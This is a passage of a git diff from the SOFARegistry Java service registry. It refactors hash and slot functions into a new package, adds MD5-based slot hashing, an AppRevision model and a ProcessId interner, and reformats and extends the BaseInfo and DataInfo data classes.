204376705..04adaec5d 100644 --- a/server/consistency/src/main/java/com/alipay/sofa/registry/consistency/hash/HashFunction.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/HashFunction.java @@ -14,19 +14,21 @@ * See the License for the specific language governing permissions and * limitations under the License. */ -package com.alipay.sofa.registry.consistency.hash; +package com.alipay.sofa.registry.common.model.slot.func; /** * Hash Function + * * @author zhuoyu.sjw * @version $Id: HashFunction.java, v 0.1 2016-11-01 15:19 zhuoyu.sjw Exp $$ */ public interface HashFunction { - /** - * return object's int hashCode - * @param o object - * @return int hashCode - */ - int hash(Object o); + /** + * return object's int hashCode + * + * @param o object + * @return int hashCode + */ + int hash(Object o); } diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/MD5HashFunction.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/MD5HashFunction.java new file mode 100644 index 000000000..12350fcfa --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/MD5HashFunction.java @@ -0,0 +1,52 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot.func; + +import com.alipay.sofa.registry.util.MessageDigests; +import java.nio.charset.Charset; + +/** + * MD5 hash function + * + * @author zhuoyu.sjw + * @version $Id: MD5HashFunction.java, v 0.1 2016-11-01 15:19 zhuoyu.sjw Exp $$ + */ +public class MD5HashFunction implements HashFunction { + + /** Default charset of UTF-8 */ + private static final Charset UTF8 = Charset.forName("UTF-8"); + + /** Instantiates a new MD5 hash function. */ + public MD5HashFunction() {} + + /** @see HashFunction#hash(Object) */ + @Override + public int hash(Object s) { + byte[] hash = MessageDigests.md5().digest(s.toString().getBytes(UTF8)); + + // HACK just take the first 4 digits and make it an integer. + // apparently this is what other algorithms use to turn it into an int + // value. + + int h0 = (hash[0] & 0xFF); + int h1 = (hash[1] & 0xFF) << 8; + int h2 = (hash[2] & 0xFF) << 16; + int h3 = (hash[3] & 0xFF) << 24; + + return h0 + h1 + h2 + h3; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/MD5SlotFunction.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/MD5SlotFunction.java new file mode 100644 index 000000000..ca8e899f2 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/MD5SlotFunction.java @@ -0,0 +1,51 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot.func; + +import com.alipay.sofa.registry.common.model.slot.SlotConfig; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-02 15:43 yuzhi.lyz Exp $ + */ +public final class MD5SlotFunction implements SlotFunction { + public static final MD5SlotFunction INSTANCE = new MD5SlotFunction(); + + private final int maxSlots; + private final MD5HashFunction md5HashFunction = new MD5HashFunction(); + + private MD5SlotFunction() { + this.maxSlots = SlotConfig.SLOT_NUM; + } + + @Override + public String name() { + return "md5"; + } + + @Override + public int maxSlots() { + return maxSlots; + } + + @Override + public int slotOf(Object o) { + // make sure >=0 + final int hash = Math.abs(md5HashFunction.hash(o)); + return hash % maxSlots; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/SlotFunction.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/SlotFunction.java new file mode 100644 index 000000000..ae16c926c --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/SlotFunction.java @@ -0,0 +1,29 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot.func; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-02 15:35 yuzhi.lyz Exp $ + */ +public interface SlotFunction { + String name(); + + int maxSlots(); + + int slotOf(Object o); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/SlotFunctionRegistry.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/SlotFunctionRegistry.java new file mode 100644 index 000000000..8c8d3078c --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/slot/func/SlotFunctionRegistry.java @@ -0,0 +1,42 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot.func; + +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.google.common.collect.Maps; +import java.util.Map; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-28 12:24 yuzhi.lyz Exp $ + */ +public final class SlotFunctionRegistry { + private static final Map funcs = Maps.newConcurrentMap(); + + static { + register(Crc32cSlotFunction.INSTANCE); + register(MD5SlotFunction.INSTANCE); + } + + public static void register(SlotFunction func) { + funcs.put(func.name(), func); + } + + public static SlotFunction getFunc() { + return funcs.get(SlotConfig.FUNC); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/AppRevision.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/AppRevision.java new file mode 100644 index 000000000..c601cb3f7 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/AppRevision.java @@ -0,0 +1,189 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.store; + +import com.alipay.sofa.registry.core.model.AppRevisionInterface; +import com.google.common.collect.Maps; +import java.io.Serializable; +import java.util.Date; +import java.util.List; +import java.util.Map; + +public class AppRevision implements Serializable { + + private String dataCenter; + + private String revision; + + private String appName; + + private String clientVersion; + + private Map> baseParams = Maps.newHashMap(); + + private Map interfaceMap = Maps.newHashMap(); + + private Date lastHeartbeat; + + public AppRevision() {} + + public AppRevision(String dataCenter, String revision, Date lastHeartbeat) { + this.dataCenter = dataCenter; + this.revision = revision; + this.lastHeartbeat = lastHeartbeat; + } + + /** + * Getter method for property dataCenter. + * + * @return property value of dataCenter + */ + public String getDataCenter() { + return dataCenter; + } + + /** + * Setter method for property dataCenter. + * + * @param dataCenter value to be assigned to property dataCenter + */ + public void setDataCenter(String dataCenter) { + this.dataCenter = dataCenter; + } + + /** + * Getter method for property revision. + * + * @return property value of revision + */ + public String getRevision() { + return revision; + } + + /** + * Setter method for property revision. + * + * @param revision value to be assigned to property revision + */ + public void setRevision(String revision) { + this.revision = revision; + } + + /** + * Getter method for property appName. + * + * @return property value of appName + */ + public String getAppName() { + return appName; + } + + /** + * Setter method for property appName. + * + * @param appName value to be assigned to property appName + */ + public void setAppName(String appName) { + this.appName = appName; + } + + /** + * Getter method for property baseParams. + * + * @return property value of baseParams + */ + public Map> getBaseParams() { + return baseParams; + } + + /** + * Setter method for property baseParams. + * + * @param baseParams value to be assigned to property baseParams + */ + public void setBaseParams(Map> baseParams) { + this.baseParams = baseParams; + } + + public Map getInterfaceMap() { + return interfaceMap; + } + + public void setInterfaceMap(Map interfaceMap) { + this.interfaceMap = interfaceMap; + } + + /** + * Getter method for property lastHeartbeat. + * + * @return property value of lastHeartbeat + */ + public Date getLastHeartbeat() { + return lastHeartbeat; + } + + /** + * Setter method for property lastHeartbeat. + * + * @param lastHeartbeat value to be assigned to property lastHeartbeat + */ + public void setLastHeartbeat(Date lastHeartbeat) { + this.lastHeartbeat = lastHeartbeat; + } + + /** + * Getter method for property clientVersion. + * + * @return property value of clientVersion + */ + public String getClientVersion() { + return clientVersion; + } + + /** + * Setter method for property clientVersion. + * + * @param clientVersion value to be assigned to property clientVersion + */ + public void setClientVersion(String clientVersion) { + this.clientVersion = clientVersion; + } + + @Override + public String toString() { + return "AppRevision{" + + "dataCenter='" + + dataCenter + + '\'' + + ", revision='" + + revision + + '\'' + + ", appName='" + + appName + + '\'' + + ", clientVersion='" + + clientVersion + + '\'' + + ", baseParams=" + + baseParams + + ", interfaceMap=" + + interfaceMap + + ", lastHeartbeat=" + + lastHeartbeat + + '}'; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/BaseInfo.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/BaseInfo.java index 7c4983356..89ff16bce 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/BaseInfo.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/BaseInfo.java @@ -16,373 +16,406 @@ */ package com.alipay.sofa.registry.common.model.store; +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.RegisterVersion; import com.fasterxml.jackson.annotation.JsonIgnore; - import java.io.Serializable; +import java.util.Collections; import java.util.HashMap; import java.util.Map; /** - * * @author shangyu.wh * @version $Id: BaseInfo.java, v 0.1 2017-11-30 16:31 shangyu.wh Exp $ */ public abstract class BaseInfo implements Serializable, StoreData { - private static final long serialVersionUID = -6263388188316303789L; - - private String dataInfoId; + private static final long serialVersionUID = -6263388188316303789L; - private String dataId; + private String dataInfoId; - private String clientId; + private String dataId; - private String instanceId; + private String clientId; - private String cell; + private String instanceId; - private String appName; + private String cell; - private String processId; + private String appName; - private String registerId; + private String processId; - private Long version; + private String registerId; - private URL sourceAddress; + private long version; - private ClientVersion clientVersion; + private URL sourceAddress; - private String group; + private URL targetAddress; - private long registerTimestamp; + private ClientVersion clientVersion; - private long clientRegisterTimestamp; + private String group; - private Map attributes = new HashMap<>(); + private long registerTimestamp; - /** - * ClientVersion Enum - */ - public enum ClientVersion { - /** */ - ProtocolPackage("1.x"), - /** */ - NProtocolpackage("2.x"), - /** */ - MProtocolpackage("3.x"), - /** */ - StoreData("4.x"); - - private String version; - - /** - * Set version val - * @param version - */ - ClientVersion(String version) { - this.version = version; - } - } + private long clientRegisterTimestamp; - /** - * Getter method for property cell. - * - * @return property value of cell - */ - public String getCell() { - return cell; - } + private Map attributes; - /** - * Setter method for property cell. - * - * @param cell value to be assigned to property cell - */ - public void setCell(String cell) { - this.cell = WordCache.getInstance().getWordCache(cell); - } + /** ClientVersion Enum */ + public enum ClientVersion { + /** */ + ProtocolPackage("1.x"), + /** */ + NProtocolpackage("2.x"), + /** */ + MProtocolpackage("3.x"), + /** */ + StoreData("4.x"); - /** - * Getter method for property appName. - * - * @return property value of appName - */ - public String getAppName() { - return appName; - } + private String version; /** - * Setter method for property appName. + * Set version val * - * @param appName value to be assigned to property appName + * @param version */ - public void setAppName(String appName) { - this.appName = WordCache.getInstance().getWordCache(appName); - } - - /** - * Getter method for property processId. - * - * @return property value of processId - */ - public String getProcessId() { - return processId; - } - - /** - * Setter method for property processId. - * - * @param processId value to be assigned to property processId - */ - public void setProcessId(String processId) { - this.processId = processId; - } - - /** - * Getter method for property version. - * - * @return property value of version - */ - public Long getVersion() { - return version; - } - - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(Long version) { - this.version = version; - } - - /** - * Getter method for property sourceAddress. - * - * @return property value of sourceAddress - */ - public URL getSourceAddress() { - return sourceAddress; - } - - /** - * Setter method for property sourceAddress. - * - * @param sourceAddress value to be assigned to property sourceAddress - */ - public void setSourceAddress(URL sourceAddress) { - this.sourceAddress = sourceAddress; - } - - /** - * Getter method for property attributes. - * - * @return property value of attributes - */ - public Map getAttributes() { - return attributes; - } - - /** - * Setter method for property attributes. - * - * @param attributes value to be assigned to property attributes - */ - public void setAttributes(Map attributes) { - Map newAttributes = new HashMap<>(); - if (attributes != null && !attributes.isEmpty()) { - attributes.forEach((key, value) -> newAttributes - .put(WordCache.getInstance().getWordCache(key), value)); - } - this.attributes = newAttributes; - } - - /** - * Getter method for property dataInfoId. - * - * @return property value of dataInfoId - */ - public String getDataInfoId() { - return dataInfoId; - } - - /** - * Setter method for property dataInfoId. - * - * @param dataInfoId value to be assigned to property dataInfoId - */ - public void setDataInfoId(String dataInfoId) { - this.dataInfoId = WordCache.getInstance().getWordCache(dataInfoId); - } - - @Override - @JsonIgnore - public String getId() { - return registerId; - } - - /** - * Getter method for property registerId. - * - * @return property value of registerId - */ - public String getRegisterId() { - return registerId; - } - - /** - * Setter method for property registerId. - * - * @param registerId value to be assigned to property registerId - */ - public void setRegisterId(String registerId) { - this.registerId = registerId; - } - - /** - * Getter method for property dataId. - * - * @return property value of dataId - */ - public String getDataId() { - return dataId; - } - - /** - * Setter method for property dataId. - * - * @param dataId value to be assigned to property dataId - */ - public void setDataId(String dataId) { - this.dataId = WordCache.getInstance().getWordCache(dataId); - } - - /** - * Getter method for property clientId. - * - * @return property value of clientId - */ - public String getClientId() { - return clientId; - } - - /** - * Setter method for property clientId. - * - * @param clientId value to be assigned to property clientId - */ - public void setClientId(String clientId) { - this.clientId = WordCache.getInstance().getWordCache(clientId); - } - - /** - * Getter method for property instanceId. - * - * @return property value of instanceId - */ - public String getInstanceId() { - return instanceId; - } - - /** - * Setter method for property instanceId. - * - * @param instanceId value to be assigned to property instanceId - */ - public void setInstanceId(String instanceId) { - this.instanceId = WordCache.getInstance().getWordCache(instanceId); - } - - /** - * Getter method for property group. - * - * @return property value of group - */ - public String getGroup() { - return group; - } - - /** - * Setter method for property group. - * - * @param group value to be assigned to property group - */ - public void setGroup(String group) { - this.group = WordCache.getInstance().getWordCache(group); - } - - /** - * Getter method for property registerTimestamp. - * - * @return property value of registerTimestamp - */ - public long getRegisterTimestamp() { - return registerTimestamp; - } - - /** - * Setter method for property registerTimestamp. - * - * @param registerTimestamp value to be assigned to property registerTimestamp - */ - public void setRegisterTimestamp(long registerTimestamp) { - this.registerTimestamp = registerTimestamp; - } - - /** - * Getter method for property clientVersion. - * - * @return property value of clientVersion - */ - public ClientVersion getClientVersion() { - return clientVersion; - } - - /** - * Setter method for property clientVersion. - * - * @param clientVersion value to be assigned to property clientVersion - */ - public void setClientVersion(ClientVersion clientVersion) { - this.clientVersion = clientVersion; - } - - public long getClientRegisterTimestamp() { - return clientRegisterTimestamp; - } - - /** - * Setter method for property clientRegisterTimestamp. - * - * @param clientRegisterTimestamp value to be assigned to property clientRegisterTimestamp - */ - public void setClientRegisterTimestamp(long clientRegisterTimestamp) { - this.clientRegisterTimestamp = clientRegisterTimestamp; - } - - protected String getOtherInfo() { - return ""; - } - - @Override - public String toString() { - final StringBuilder sb = new StringBuilder(getDataType().toString()); - sb.append("{dataInfoId='").append(dataInfoId).append('\''); - sb.append(", clientId='").append(clientId).append('\''); - sb.append(", cell='").append(cell).append('\''); - sb.append(", appName='").append(appName).append('\''); - sb.append(", processId='").append(processId).append('\''); - sb.append(", registerId='").append(registerId).append('\''); - sb.append(", version=").append(version); - sb.append(", sourceAddress=").append(sourceAddress); - sb.append(", clientVersion=").append(clientVersion); - sb.append(", registerTimestamp=").append(registerTimestamp); - sb.append(", clientRegisterTimestamp=").append(clientRegisterTimestamp); - sb.append(", otherInfo=").append(getOtherInfo()); - sb.append(", attributes=").append(attributes); - sb.append('}'); - return sb.toString(); - } - -} \ No newline at end of file + ClientVersion(String version) { + this.version = version; + } + } + + /** + * Getter method for property cell. + * + * @return property value of cell + */ + public String getCell() { + return cell; + } + + /** + * Setter method for property cell. + * + * @param cell value to be assigned to property cell + */ + public void setCell(String cell) { + this.cell = WordCache.getWordCache(cell); + } + + /** + * Getter method for property appName. + * + * @return property value of appName + */ + public String getAppName() { + return appName; + } + + /** + * Setter method for property appName. + * + * @param appName value to be assigned to property appName + */ + public void setAppName(String appName) { + this.appName = WordCache.getWordCache(appName); + } + + /** + * Getter method for property processId. + * + * @return property value of processId + */ + public String getProcessId() { + return processId; + } + + /** + * Setter method for property processId. + * + * @param processId value to be assigned to property processId + */ + public void setProcessId(String processId) { + this.processId = WordCache.getWordCache(processId); + } + + /** + * Getter method for property version. + * + * @return property value of version + */ + public long getVersion() { + return version; + } + + /** + * Setter method for property version. + * + * @param version value to be assigned to property version + */ + public void setVersion(long version) { + this.version = version; + } + + /** + * Getter method for property sourceAddress. + * + * @return property value of sourceAddress + */ + public URL getSourceAddress() { + return sourceAddress; + } + + /** + * Setter method for property sourceAddress. + * + * @param sourceAddress value to be assigned to property sourceAddress + */ + public void setSourceAddress(URL sourceAddress) { + this.sourceAddress = sourceAddress; + } + + /** + * Getter method for property targetAddress. + * + * @return property value of targetAddress + */ + public URL getTargetAddress() { + return targetAddress; + } + + /** + * Setter method for property targetAddress. + * + * @param targetAddress value to be assigned to property targetAddress + */ + public void setTargetAddress(URL targetAddress) { + this.targetAddress = targetAddress; + } + + /** + * Getter method for property attributes. + * + * @return property value of attributes + */ + public synchronized Map getAttributes() { + if (attributes == null) { + return Collections.EMPTY_MAP; + } + return new HashMap<>(attributes); + } + + /** + * Setter method for property attributes. + * + * @param attributes value to be assigned to property attributes + */ + public synchronized void setAttributes(Map attributes) { + if (attributes == null || attributes.isEmpty()) { + this.attributes = null; + } else { + this.attributes = new HashMap<>(attributes); + } + } + + /** + * Getter method for property dataInfoId. + * + * @return property value of dataInfoId + */ + public String getDataInfoId() { + return dataInfoId; + } + + /** + * Setter method for property dataInfoId. + * + * @param dataInfoId value to be assigned to property dataInfoId + */ + public void setDataInfoId(String dataInfoId) { + this.dataInfoId = WordCache.getWordCache(dataInfoId); + } + + @Override + @JsonIgnore + public String getId() { + return registerId; + } + + /** + * Getter method for property registerId. + * + * @return property value of registerId + */ + public String getRegisterId() { + return registerId; + } + + /** + * Setter method for property registerId. + * + * @param registerId value to be assigned to property registerId + */ + public void setRegisterId(String registerId) { + this.registerId = registerId; + } + + /** + * Getter method for property dataId. + * + * @return property value of dataId + */ + public String getDataId() { + return dataId; + } + + /** + * Setter method for property dataId. + * + * @param dataId value to be assigned to property dataId + */ + public void setDataId(String dataId) { + this.dataId = WordCache.getWordCache(dataId); + } + + /** + * Getter method for property clientId. + * + * @return property value of clientId + */ + public String getClientId() { + return clientId; + } + + /** + * Setter method for property clientId. + * + * @param clientId value to be assigned to property clientId + */ + public void setClientId(String clientId) { + this.clientId = WordCache.getWordCache(clientId); + } + + /** + * Getter method for property instanceId. + * + * @return property value of instanceId + */ + public String getInstanceId() { + return instanceId; + } + + /** + * Setter method for property instanceId. + * + * @param instanceId value to be assigned to property instanceId + */ + public void setInstanceId(String instanceId) { + this.instanceId = WordCache.getWordCache(instanceId); + } + + /** + * Getter method for property group. + * + * @return property value of group + */ + public String getGroup() { + return group; + } + + /** + * Setter method for property group. + * + * @param group value to be assigned to property group + */ + public void setGroup(String group) { + this.group = WordCache.getWordCache(group); + } + + /** + * Getter method for property registerTimestamp. + * + * @return property value of registerTimestamp + */ + public long getRegisterTimestamp() { + return registerTimestamp; + } + + /** + * Setter method for property registerTimestamp. + * + * @param registerTimestamp value to be assigned to property registerTimestamp + */ + public void setRegisterTimestamp(long registerTimestamp) { + this.registerTimestamp = registerTimestamp; + } + + /** + * Getter method for property clientVersion. + * + * @return property value of clientVersion + */ + public ClientVersion getClientVersion() { + return clientVersion; + } + + /** + * Setter method for property clientVersion. + * + * @param clientVersion value to be assigned to property clientVersion + */ + public void setClientVersion(ClientVersion clientVersion) { + this.clientVersion = clientVersion; + } + + public long getClientRegisterTimestamp() { + return clientRegisterTimestamp; + } + + /** + * Setter method for property clientRegisterTimestamp. + * + * @param clientRegisterTimestamp value to be assigned to property clientRegisterTimestamp + */ + public void setClientRegisterTimestamp(long clientRegisterTimestamp) { + this.clientRegisterTimestamp = clientRegisterTimestamp; + } + + protected String getOtherInfo() { + return ""; + } + + @Override + public String toString() { + final StringBuilder sb = new StringBuilder(getDataType().toString()); + sb.append("{dataInfoId='").append(dataInfoId).append('\''); + sb.append(", clientId='").append(clientId).append('\''); + sb.append(", cell='").append(cell).append('\''); + sb.append(", appName='").append(appName).append('\''); + sb.append(", processId='").append(processId).append('\''); + sb.append(", registerId='").append(registerId).append('\''); + sb.append(", version=").append(version); + sb.append(", sourceAddress=").append(sourceAddress); + sb.append(", clientVersion=").append(clientVersion); + sb.append(", registerTimestamp=").append(registerTimestamp); + sb.append(", clientRegisterTimestamp=").append(clientRegisterTimestamp); + sb.append(", otherInfo=").append(getOtherInfo()); + sb.append(", attributes=").append(attributes); + sb.append('}'); + return sb.toString(); + } + + public ConnectId connectId() { + return new ConnectId( + getSourceAddress().getIpAddress(), + getSourceAddress().getPort(), + getTargetAddress().getIpAddress(), + getTargetAddress().getPort()); + } + + public RegisterVersion registerVersion() { + return RegisterVersion.of(getVersion(), getRegisterTimestamp()); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/DataInfo.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/DataInfo.java index f519b44b0..de54e1a52 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/DataInfo.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/DataInfo.java @@ -16,153 +16,168 @@ */ package com.alipay.sofa.registry.common.model.store; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.util.ParaCheckUtil; import java.io.Serializable; +import java.util.Objects; /** - * * @author shangyu.wh * @version $Id: DataInfo.java, v 0.1 2017-11-30 16:09 shangyu.wh Exp $ */ public class DataInfo implements Serializable { - private String dataInfoId; - - private String instanceId; - - private String dataId; - - private String dataType; - - /** symbol : */ - public static final String DELIMITER = "#@#"; - - public static final int DATAID_LENTH = 3; - - /** - * @param instanceId - * @param dataId - * @param dataType - */ - public DataInfo(String instanceId, String dataId, String dataType) { - this.instanceId = instanceId; - this.dataId = dataId; - this.dataType = dataType; - this.dataInfoId = toDataInfoId(dataId, instanceId, dataType); - } - - /** - * @param dataId - * @param instanceId - * @param dataType - * @return - */ - public static String toDataInfoId(String dataId, String instanceId, String dataType) { - StringBuilder buf = new StringBuilder(); - if (dataId == null || dataId.isEmpty()) { - throw new IllegalArgumentException("error dataId:" + dataId); - } - buf.append(dataId); - - if (instanceId == null || instanceId.isEmpty()) { - throw new IllegalArgumentException("error instanceId:" + instanceId); - } - buf.append(DELIMITER).append(instanceId); - - if (dataType == null || dataType.isEmpty()) { - throw new IllegalArgumentException("error dataType:" + dataType); - } - buf.append(DELIMITER).append(dataType); - - return buf.toString(); - } - - /** - * - * @param dataInfoId - * @return - */ - public static DataInfo valueOf(String dataInfoId) { - if (dataInfoId == null || dataInfoId.isEmpty()) { - throw new IllegalArgumentException("dataInfoId null"); - } - - String[] str = dataInfoId.split(DELIMITER); - if (str.length != DATAID_LENTH) { - throw new IllegalArgumentException("dataInfoId input error!"); - } - - return new DataInfo(str[1], str[0], str[2]); - } - - /** - * Getter method for property dataInfoId. - * - * @return property value of dataInfoId - */ - public String getDataInfoId() { - return dataInfoId; - } - - /** - * Setter method for property dataInfoId. - * - * @param dataInfoId value to be assigned to property dataInfoId - */ - public void setDataInfoId(String dataInfoId) { - this.dataInfoId = dataInfoId; + private String dataInfoId; + + private String instanceId; + + private String dataId; + + private String group; + + /** symbol : */ + public static final String DELIMITER = "#@#"; + + public static final int DATAID_LENTH = 3; + + /** + * @param instanceId + * @param dataId + * @param group + */ + public DataInfo(String instanceId, String dataId, String group) { + this.instanceId = instanceId; + this.dataId = dataId; + this.group = group; + this.dataInfoId = toDataInfoId(dataId, instanceId, group); + } + + /** + * @param dataId + * @param instanceId + * @param group + * @return + */ + public static String toDataInfoId(String dataId, String instanceId, String group) { + StringBuilder buf = new StringBuilder(); + if (dataId == null || dataId.isEmpty()) { + throw new IllegalArgumentException("error dataId:" + dataId); } - - /** - * Getter method for property instanceId. - * - * @return property value of instanceId - */ - public String getInstanceId() { - return instanceId; + if (ValueConstants.DISABLE_DATA_ID_CASE_SENSITIVE) { + buf.append(dataId.toUpperCase()); + } else { + buf.append(dataId); } - /** - * Setter method for property instanceId. - * - * @param instanceId value to be assigned to property instanceId - */ - public void setInstanceId(String instanceId) { - this.instanceId = instanceId; + if (instanceId == null || instanceId.isEmpty()) { + throw new IllegalArgumentException("error instanceId:" + instanceId); } + buf.append(DELIMITER).append(instanceId); - /** - * Getter method for property dataId. - * - * @return property value of dataId - */ - public String getDataId() { - return dataId; + if (group == null || group.isEmpty()) { + throw new IllegalArgumentException("error group:" + group); } - - /** - * Setter method for property dataId. - * - * @param dataId value to be assigned to property dataId - */ - public void setDataId(String dataId) { - this.dataId = dataId; + buf.append(DELIMITER).append(group); + + return buf.toString(); + } + + /** + * @param dataInfoId + * @return + */ + public static DataInfo valueOf(String dataInfoId) { + ParaCheckUtil.checkNotBlank(dataInfoId, "dataInfoId"); + String[] str = dataInfoId.split(DELIMITER); + if (str.length != DATAID_LENTH) { + throw new IllegalArgumentException("dataInfoId input error!"); } - /** - * Getter method for property dataType. - * - * @return property value of dataType - */ - public String getDataType() { - return dataType; - } - - /** - * Setter method for property dataType. - * - * @param dataType value to be assigned to property dataType - */ - public void setDataType(String dataType) { - this.dataType = dataType; - } -} \ No newline at end of file + return new DataInfo(str[1], str[0], str[2]); + } + + /** + * Getter method for property dataInfoId. + * + * @return property value of dataInfoId + */ + public String getDataInfoId() { + return dataInfoId; + } + + /** + * Setter method for property dataInfoId. + * + * @param dataInfoId value to be assigned to property dataInfoId + */ + public void setDataInfoId(String dataInfoId) { + this.dataInfoId = dataInfoId; + } + + /** + * Getter method for property instanceId. + * + * @return property value of instanceId + */ + public String getInstanceId() { + return instanceId; + } + + /** + * Setter method for property instanceId. + * + * @param instanceId value to be assigned to property instanceId + */ + public void setInstanceId(String instanceId) { + this.instanceId = instanceId; + } + + /** + * Getter method for property dataId. + * + * @return property value of dataId + */ + public String getDataId() { + return dataId; + } + + /** + * Setter method for property dataId. + * + * @param dataId value to be assigned to property dataId + */ + public void setDataId(String dataId) { + this.dataId = dataId; + } + + /** + * Getter method for property dataType. + * + * @return property value of dataType + */ + public String getGroup() { + return group; + } + + /** + * Setter method for property dataType. + * + * @param group value to be assigned to property dataType + */ + public void setGroup(String group) { + this.group = group; + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + DataInfo dataInfo = (DataInfo) o; + return dataInfoId.equals(dataInfo.dataInfoId); + } + + @Override + public int hashCode() { + return Objects.hash(dataInfoId); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/ProcessIdCache.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/ProcessIdCache.java new file mode 100644 index 000000000..4a91cc2ea --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/store/ProcessIdCache.java @@ -0,0 +1,34 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.store; + +import com.alipay.sofa.registry.common.model.ProcessId; +import com.google.common.collect.Interner; +import com.google.common.collect.Interners; + +public final class ProcessIdCache { + private static final Interner interners = Interners.newWeakInterner(); + + private ProcessIdCache() {} + + public static ProcessId cache(ProcessId pid) { + if (pid == null) { + return null; + } + return interners.intern(pid); + } +} diff --git 